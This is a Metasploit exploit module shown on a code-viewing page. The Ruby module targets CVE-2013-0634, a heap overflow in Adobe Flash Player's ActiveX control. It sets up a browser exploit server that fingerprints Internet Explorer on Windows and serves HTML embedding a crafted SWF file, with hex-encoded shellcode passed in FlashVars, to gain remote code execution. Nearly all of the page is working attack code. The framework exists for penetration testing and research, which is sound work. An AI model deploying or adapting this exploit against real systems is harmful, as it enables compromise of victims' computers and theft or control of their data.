Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_regex_value.rb
19719 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Adobe Flash Player Regular Expression Heap Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in the ActiveX component of Adobe

18
          Flash Player before 11.5.502.149. By supplying a specially crafted swf file

19
          with special regex value, it is possible to trigger a memory corruption, which

20
          results in remote code execution under the context of the user, as exploited in

21
          the wild in February 2013. This module has been tested successfully with Adobe

22
          Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before

23
          MS13-063, since it takes advantage of a predictable SharedUserData in order to

24
          leak ntdll and bypass ASLR.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'Unknown', # malware sample

29
          'Boris "dukeBarman" Ryutin', # msf exploit

30
          'juan vazquez'               # ActionScript deobfuscation and cleaning

31
        ],

32
        'References' => [

33
          [ 'CVE', '2013-0634' ],

34
          [ 'OSVDB', '89936'],

35
          [ 'BID', '57787'],

36
          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],

37
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],

38
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],

39
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],

40
          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]

41
        ],

42
        'Payload' => {

43
          'Space' => 1024,

44
          'DisableNops' => true

45
        },

46
        'DefaultOptions' => {

47
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

48
          'Retries' => false

49
        },

50
        'Platform' => 'win',

51
        'BrowserRequirements' => {

52
          :source => /script|headers/i,

53
          :activex => [

54
            {

55
              clsid: "{D27CDB6E-AE6D-11cf-96B8-444553540000}",

56
              method: "LoadMovie"

57
            }

58
          ],

59
          :os_name => OperatingSystems::Match::WINDOWS,

60
          :ua_name => Msf::HttpClients::IE,

61
          :flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }

62
        },

63
        'Targets' => [

64
          [ 'Automatic', {} ]

65
        ],

66
        'Privileged' => false,

67
        'DisclosureDate' => '2013-02-08',

68
        'DefaultTarget' => 0,

69
        'Notes' => {

70
          'Reliability' => UNKNOWN_RELIABILITY,

71
          'Stability' => UNKNOWN_STABILITY,

72
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

73
        }

74
      )

75
    )

76
  end

77


78
  def exploit

79
    @swf = create_swf

80
    super

81
  end

82


83
  def on_request_exploit(cli, request, target_info)

84
    print_status("Request: #{request.uri}")

85


86
    if request.uri =~ /\.swf$/

87
      print_status("Sending SWF...")

88
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Pragma' => 'no-cache' })

89
      return

90
    end

91


92
    print_status("Sending HTML...")

93
    tag = retrieve_tag(cli, request)

94
    profile = browser_profile[tag]

95
    profile[:tried] = false unless profile.nil? # to allow request the swf

96
    send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })

97
  end

98


99
  def exploit_template(cli, target_info)

100
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"

101
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

102


103
    html_template = %Q|<html>

104
    <body>

105
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />

106
    <param name="movie" value="<%=swf_random%>" />

107
    <param name="allowScriptAccess" value="always" />

108
    <param name="FlashVars" value="his=<%=shellcode%>" />

109
    <param name="Play" value="true" />

110
    </object>

111
    </body>

112
    </html>

113
    |

114


115
    return html_template, binding()

116
  end

117


118
  def create_swf

119
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf")

120
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

121


122
    swf

123
  end

124
end

125


126